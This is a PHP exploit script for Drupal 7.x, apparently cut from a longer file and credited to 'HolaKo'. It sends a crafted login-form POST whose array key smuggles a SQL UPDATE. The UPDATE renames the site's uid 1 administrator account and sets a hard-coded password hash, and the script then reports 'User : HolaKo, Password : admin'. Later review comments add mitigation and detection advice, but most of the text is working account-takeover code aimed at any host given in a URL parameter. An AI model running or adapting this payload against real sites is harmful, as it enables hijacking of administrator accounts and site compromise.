Drupal Exploit
Version 7.x
array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '/user/login/', null, $ctx);
echo "Testing user/login
";
if((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data)|| (stristr($data, 'FcUk Crap') && $data)) {
echo "Success
User : HolaKo
Password : admin
Click here";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
}
// Second probe: runs when the `submit` query parameter is present. It sends one
// crafted login-form POST to the target's index path and reports whether the
// response contains a specific PHP warning string.
// NOTE(review): this appears to target the Drupal 7.x SQL injection in which the
// array keys of a submitted form value reach a database query. Confirm against
// the vendor advisory; this page names neither an advisory nor a fixed release.
// Mitigation: apply the Drupal core security update for that issue. Where
// exposure is suspected, review the uid 1 account and the `users` table for
// unexpected name/pass changes and rotate credentials.
if(isset($_GET['submit'])){
// The target host is taken verbatim from the `url` request parameter with no
// validation, so anyone who can reach this script can make the hosting server
// issue outbound HTTP requests to a host of their choosing.
$url = "http://".$_GET['url']."/";
// POST body for form_id=user_login_block. `name` is submitted as an array, and
// the first array KEY (not its value) carries a SQL UPDATE against the `users`
// table for uid 1 (`%3D` is a URL-encoded `=`).
// Detection: a legitimate login submits `name` as a scalar, so a `name[` key
// containing `;`, `#` or SQL keywords in a request body is a high-confidence
// signal for WAF/IDS rules and access-log review. The account name 'HolaKo'
// and the hard-coded hash below are indicators to search for in the `users`
// table and in backups when triaging a suspected compromise.
// NOTE(review): the `$S$` prefix suggests a Drupal password hash; the success
// message below claims it corresponds to the password "admin" — confirm.
$post_data = "name[0;update users set name %3D 'HolaKo' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "' where uid %3D '1';#]=test3&name[]=Crap&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
// Stream-context options: a form-encoded HTTP POST carrying $post_data.
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
// The request goes to `?q=node&destination=node` on the target.
// file_get_contents() returns false on failure; the `&& $data` test below
// treats a false or empty response as the error case.
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
echo 'Testing at Index
';
// The verdict depends only on the response body containing the PHP warning
// text `mb_strlen() expects parameter 1 to be string`, so it is visible only
// when the site displays PHP errors to visitors. For defenders: the warning is
// a side effect, so its absence from a response is not evidence that a site is
// patched. Verify the installed core release instead.
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success
User : HolaKo
Password : admin
Click here";
} else {
// Printed for every other outcome, including a failed or empty HTTP response.
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
}
?>
Developed By HolaKo